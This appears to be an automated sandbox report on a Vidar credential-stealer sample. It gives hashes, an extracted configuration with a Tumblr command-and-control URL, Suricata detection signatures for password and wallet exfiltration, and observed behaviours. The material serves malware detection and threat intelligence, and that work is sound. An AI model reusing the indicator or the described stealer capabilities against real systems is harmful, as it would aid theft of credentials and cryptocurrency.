General
-
Target
32240716f56a089ce49fcd044d20d7e8
-
Size
1.0MB
-
Sample
210917-gyrb2ahgcr
-
MD5
32240716f56a089ce49fcd044d20d7e8
-
SHA1
fb8ea0782fd0a016608e456882b2a0fafe978405
-
SHA256
8117405a4dfe0e21ae2064f1a129da59dbc31d3830967e43e0b63f9c52b058c1
-
SHA512
c415146be9d72e204d4bf6528f076f6a6885e5e3e6cbc0f1cba6a35b6da80bde576b6444c74e0925dbcadc959562f72b69756a04a534e75ed7b08fa6889649a9
Static task
static1
Behavioral task
behavioral1
Sample
32240716f56a089ce49fcd044d20d7e8.exe
Resource
win7-en-20210916
Malware Config
Extracted
vidar
40.6
921
https://dimonbk83.tumblr.com/
-
profile_id
921
Targets
-
-
Target
32240716f56a089ce49fcd044d20d7e8
-
Size
1.0MB
-
MD5
32240716f56a089ce49fcd044d20d7e8
-
SHA1
fb8ea0782fd0a016608e456882b2a0fafe978405
-
SHA256
8117405a4dfe0e21ae2064f1a129da59dbc31d3830967e43e0b63f9c52b058c1
-
SHA512
c415146be9d72e204d4bf6528f076f6a6885e5e3e6cbc0f1cba6a35b6da80bde576b6444c74e0925dbcadc959562f72b69756a04a534e75ed7b08fa6889649a9
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Vidar Stealer
-
Downloads MZ/PE file
-
Deletes itself
-
Loads dropped DLL
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext
-